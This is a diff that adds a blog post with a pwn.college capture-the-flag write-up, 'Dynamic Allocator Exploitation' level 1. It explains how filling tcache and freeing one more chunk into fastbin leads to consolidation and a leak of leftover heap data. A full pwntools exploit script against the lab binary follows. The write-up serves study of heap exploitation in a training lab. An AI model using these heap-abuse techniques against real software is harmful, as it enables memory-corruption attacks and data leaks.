F7-DAMM

Author: hackeringtrue

_posts/2025-10-18-pwn-college-Dynamic-Allocator-Exploitation-level1.md

@@ -0,0 +1,72 @@
+---
+layout: post
+title: (Dynamic Allocator Exploitation) level 1
+categories: pwn.college Dynamic-Allocator-Exploitation
+date: 2025-10-18 08:00:27 +0300
+tags: pwn.college PIE ASLR heap house-of-force tecache metadata house-of-spirit
+---
+## Information
+- category: pwn
+
+
+## Description 
+> Leverage consolidation to obtain the flag.
+
+## Write-up
+
+ Tcache holds up to **7** freed chunks of a given size. 
+
+ Do: allocate N chunks of size S, then `free()` 7 of them to fill tcache. 
+ 
+ ***Then free one more chunk of size S — that one will go to fastbin instead of tcache.***
+
+ Later, perform the action (in this binary it’s `read_flag`/a `malloc` path) that causes consolidation. Now the freed chunk’s address can be returned. * Use `puts` (or similar) on that returned pointer — it prints whatever was left in the chunk (pointers, strings, etc.), leaking addresses.
+
+## Exploit
+```python
+from pwn import *
+
+elf = context.binary = ELF("/challenge/toddlerheap_level1.1")
+global p
+p = elf.process()
+
+def malloc(idx,size):
+    p.sendline(b"malloc")
+    p.sendline(idx)
+    p.sendline(size)
+
+def free(idx):
+    p.sendline(b"free")
+    p.sendline(idx)
+
+def puts(idx):
+    p.sendline(b"puts")
+    p.sendline(idx)
+
+def read_flag():
+    p.sendline(b"read_flag")
+
+def quit():
+    p.sendline(b"quit")
+
+def exploit():
+    for i in range(8):
+        malloc(f"{i}".encode(),b"0")
+
+    for i in range(8):
+        free(f"{i}".encode())
+    
+    read_flag()
+
+    puts(b"7")
+
+    quit()
+    
+    p.interactive()
+    
+def main():
+    exploit()
+
+if __name__ == "__main__":
+    main()
+```